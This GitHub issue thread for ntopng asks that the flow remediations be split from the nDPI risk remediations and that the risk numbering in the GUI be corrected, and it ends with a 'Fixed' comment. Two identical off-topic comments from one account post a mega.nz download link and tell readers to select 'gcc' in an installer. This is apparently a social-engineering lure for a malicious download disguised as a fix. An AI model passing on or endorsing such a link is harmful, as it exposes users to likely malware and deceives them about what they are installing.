### ISSUE TITLE
Split Flow/nDPI Remediations

### ISSUE THREAD

**Issue by lucaderi** [ntop/ntopng#8669]
As of today the flow remediations ae broken and needs to be fixed. As many flow alerts are derived from nDPI risks (https://github.com/ntop/nDPI/blob/dev/src/include/ndpi_typedefs.h#L114), this is to request to
- split ntopng from nDPI flow remediations dividing them in two files (this is partially so in https://github.com/ntop/ntopng/tree/dev/doc/src/remediations). This was nDPI maintainers can update the [ndpi_risks.rst](https://github.com/ntop/ntopng/blob/dev/doc/src/remediations/ndpi_risks.rst) file without ntopng developer assistance.
- As nDPi risks have different numbering with respect to [flow_alert_keys.lua](https://github.com/ntop/ntopng/blob/dev/scripts/lua/modules/alert_keys/flow_alert_keys.lua) in the ntopng GUI the function that maps the risk to a number must be updated
<img width="923" alt="image" src="https://github.com/user-attachments/assets/b7dec441-0ee6-4dc8-bd71-38c24ad002bc">
so that nDPI remediations will jump to

 [ndpi_risks.rst](https://github.com/ntop/ntopng/blob/dev/doc/src/remediations/ndpi_risks.rst) that have a different numbering as defined in https://github.com/ntop/nDPI/blob/dev/src/include/ndpi_typedefs.h#L113

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by DGabri** [comment]
Fixed
